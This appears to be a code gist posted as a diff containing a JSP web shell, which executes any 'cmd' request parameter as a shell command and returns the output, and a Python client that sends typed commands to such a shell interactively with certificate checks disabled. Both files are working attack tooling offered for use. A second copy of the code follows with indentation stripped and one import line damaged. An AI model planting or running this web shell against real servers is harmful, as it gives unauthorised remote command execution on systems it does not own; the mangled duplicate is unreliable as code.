FrankSpierings · August 9, 2019 14:21
diff --git a/Readme.md b/Readme.md
diff --git a/index.jsp b/index.jsp
 <%@ page import="java.util.*,java.io.*"%>
 <%
 if (request.getParameter("cmd") != null)
 {	
 	String[] cmd = {"/bin/sh","-c",request.getParameter("cmd")};
 	Process p = Runtime.getRuntime().exec(cmd);
 	InputStream in = p.getInputStream();
 	InputStream err = p.getErrorStream();
 	DataInputStream dis = new DataInputStream(in);
 	String disr = dis.readLine();
 	while ( disr != null )
 	{
 		out.println(disr);
 		disr = dis.readLine();
 	}
 	dis = new DataInputStream(err);
 	disr = dis.readLine();
 	while ( disr != null )
 	{
 		out.println(disr);
 		disr = dis.readLine();
 	}
 }
 %>
diff --git a/webshell.py b/webshell.py
 #!/usr/bin/env python3
 import requests
 import readline
 import argparse


 def webexec(url, cmd):
    data = {'cmd': "{0}".format(cmd)}
    r = session.post(url, params=data)
    if r.status_code == 200:
        print(r.content.decode(errors='replace').strip())

 if __name__ == "__main__":
    requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

    parser = argparse.ArgumentParser(description='Execute command against a webshell')
    parser.add_argument('url', help='The base URL: https://127.0.0.1:8081')
    
    args = parser.parse_args()
    
    session = requests.Session()
    session.verify = False
    session.proxies = {'http':'http://127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

    while True:
        try:
            cmd = input('$ ')
            if cmd != '':
                webexec(args.url, cmd)
        except KeyboardInterrupt:
            break
	<%@ page import="java.util.,java.io."%>
	<%
	if (request.getParameter("cmd") != null)
	{
	String[] cmd = {"/bin/sh","-c",request.getParameter("cmd")};
	Process p = Runtime.getRuntime().exec(cmd);
	InputStream in = p.getInputStream();
	InputStream err = p.getErrorStream();
	DataInputStream dis = new DataInputStream(in);
	String disr = dis.readLine();
	while ( disr != null )
	{
	out.println(disr);
	disr = dis.readLine();
	}
	dis = new DataInputStream(err);
	disr = dis.readLine();
	while ( disr != null )
	{
	out.println(disr);
	disr = dis.readLine();
	}
	}
	%>
	#!/usr/bin/env python3
	import requests
	import readline
	import argparse


	def webexec(url, cmd):
	data = {'cmd': "{0}".format(cmd)}
	r = session.post(url, params=data)
	if r.status_code == 200:
	print(r.content.decode(errors='replace').strip())

	if __name__ == "__main__":
	requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

	parser = argparse.ArgumentParser(description='Execute command against a webshell')
	parser.add_argument('url', help='The base URL: https://127.0.0.1:8081')

	args = parser.parse_args()

	session = requests.Session()
	session.verify = False
	session.proxies = {'http':'http://127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

	while True:
	try:
	cmd = input('$ ')
	if cmd != '':
	webexec(args.url, cmd)
	except KeyboardInterrupt:
	break